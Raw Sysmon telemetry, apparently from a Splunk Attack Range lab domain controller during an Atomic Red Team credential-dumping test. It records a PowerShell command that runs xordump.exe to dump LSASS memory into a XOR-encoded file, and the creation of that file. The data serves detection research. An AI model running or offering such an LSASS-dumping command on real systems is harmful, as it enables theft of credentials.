21:10:31.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000026083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000026082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.088{4DB9351A-A347-60D3-6706-00000000CF01}5864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\Temp\xordump.exe -out C:\Windows\Temp\lsass-xordump.t1003.001.dmp -x 0x41} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000026081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000026080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.082{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000026079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56075C40726274E47195D9670857C0F5,SHA256=1FB63981FF9129E0BC747E18FB69218953D2E2FB398EBA6824C82B4EB22B30C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.004{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=9BF7915FE803EC5DC3C4166FE6C1B850,SHA256=10D072A2E571CF35220E11C4F4E3A19BE48856C62E1E1AF8848B4C3431220524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:31.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F39680F931227420C0518FE3862B0FC,SHA256=13A40E8D1F19136BAC3C72358703BB3C41BB6671D8FBDD8BF806FC7B61ED2C1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:32.264{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D85FBBCB0DE2969ACB401DE257EFA300,SHA256=B976F1A6986E8F92B7CDBD93695F71EBA6EAEFF4207A318458BCC057DD82F8BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:33.364{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E10C2C11002467F2D7D77EC176BA4058,SHA256=FCDA62A817FA13BBE1D0C338A434D8E9E442C70123396B78461D11B8952A0DF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:33.271{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9CB77A75A86A1AACAA19D6EE8641AC,SHA256=E158F5495A8FCCAB253720E297AB9D73AEEE6517ED3180AEE5CBC582B23E6040,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000026122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:34.508{4DB9351A-A347-60D3-6806-00000000CF01}2932C:\Windows\Temp\xordump.exeC:\Windows\Temp\lsass-xordump.t1003.001.dmp2021-06-23 21:10:34.508 23542300x800000000000000026121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:34.274{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFC39B1B250CFFFBDEB14BC39DE6E8F8,SHA256=2C55BF5013D9C4F08F9B16718B969A30D1B9189E18CDF9F02A618784BF1016D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000026120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:33.200{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61545-false10.0.1.12-8000- 23542300x800000000000000026119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:34.208{4DB9351A-A347-60D3-6806-00000000CF01}2932ATTACKRANGE\AdministratorC:\Windows\Temp\xordump.exeC:\Users\ADMINI~1\AppData\Local\Temp\345490315.tmpMD5=4D2BA74E466DA6F78D196DA6A8807653,SHA256=F0F7A8A2D569476EF51F2B0B5D04AB6635240DED07FB4BB3B15AD0EBC3FB3423,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:35.369{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 